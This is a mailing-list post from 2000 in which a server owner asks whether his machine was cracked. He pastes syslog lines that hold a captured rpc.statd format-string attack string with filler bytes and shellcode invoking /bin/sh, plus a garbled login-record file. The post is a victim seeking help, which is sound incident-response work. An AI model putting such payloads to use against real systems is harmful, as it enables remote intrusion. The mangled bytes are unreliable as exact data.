Was my system cracked? (retry 2)

Sun, 01 Oct 2000 13:53:53 -0500 

I just realised my earlier tries at sending this message were full of
almost 300K of control characters. I am trying again. Apologies if it
repeats.

*****

Hi all--

I arrived home tonight to see the following message plastered across all my
terminal windows on my webserver, ludism.org:

Message from [EMAIL PROTECTED] at Sat Sep 30 19:10:53 2000 ... ludism

"???" I thought, and checked the system logs, which read as follows for the
period in question:


Sep 30 19:04:50 ludism inetd[219]: smtp/tcp: bind: Address already in use
Sep 30 19:08:01 ludism /USR/SBIN/CRON[32062]: (mail) CMD ( if [ -x
/usr/sbin/exim -a -f /etc/exim.conf ]; then /usr/sbin/exim -q >/dev/null
2>&1; fi) Sep 30 19:09:00 ludism innd: ME time 599939 idle 599938(2)
artwrite 0(0) artlink 0(0) hiswrite 0(0) hissync 0(3) Sep 30 19:10:53 ludism
Sep 30 19:10:53 ludism syslogd: Cannot glue message parts together Sep 30
19:10:53 ludism 173>Sep 30 19:10:53 /sbin/rpc.statd[205]: gethostbyname
error for
^X—ø^X—ø^Y—ø^Y—ø^Z—ø^Z—ø^[—ø^[—ø%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10x%n%192x%nêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêê1¿Î|YâA^PâA^Hœ¿âA^D∜¿â^AƒfÕĄ^BâY^LA^NôA^H^PâI^DÄA^D^Là^AƒfÕĄ^DƒfÕĄ^E0¿àA^DƒfÕ
Sep 30 19:10:53 ludism «^F/bin«F^D/shA0¿àF^Gâv^LçV^PçN^Lâۃ^KÕă^AÕÄ˝
Sep 30 19:14:01 ludism /USR/SBIN/CRON[32067]: (news) CMD (rnews -U) Sep 30
19:14:01 ludism innd: ME time 300548 idle 300544(2) artwrite 0(0) artlink
0(0) hiswrite 0(0) hissync 0(3)

I am far from a security expert, but it looks as though someone might have
been running some sort of shell script ("/bin/sh" appears somewhere near
the end of the garbage) via rpc. I also read the IP address 236.137.10.192
near the beginning, but can't locate that machine via host or ping.

Was this one of the famous sysklogd exploits? Yes, I was lazy and did not
upgrade until tonight, but I fear it may be too late.

I also found a file dated Friday, 22 September 2000, 6:03 PM in my /var/log
directory, reading thusly:

µvƒ9tty1
[...a whole lot of invisible characters...]
НÀ9tty1F*¥9tty2ÿâã8ttyp4c1019188-a.fedwy1.wa.home.comÖd 8tty2®v
8tty22”«9pts/563.225.161.91íe9ttyp4www.ludism.org

So, do you think my machine has been cracked? It looks as though they've
been trying to cover their tracks, but not doing it very well. If it is a
crack, what can I do about it apart from wiping the machine and rebuilding
from the ground up?

Thanks...

Ron Hale-Evans

--
   Ron's Info Closet: Center for Ludic Synergy, Kennexions Glass Bead Game,
    Positive Revolution FAQ, Hexagram-8 I Ching Mailing List, and links...
   Ron Hale-Evans ... [EMAIL PROTECTED] ... <http://www.apocalypse.org/~rwhe/>
                    Further up and further in! fnord

Reply via email to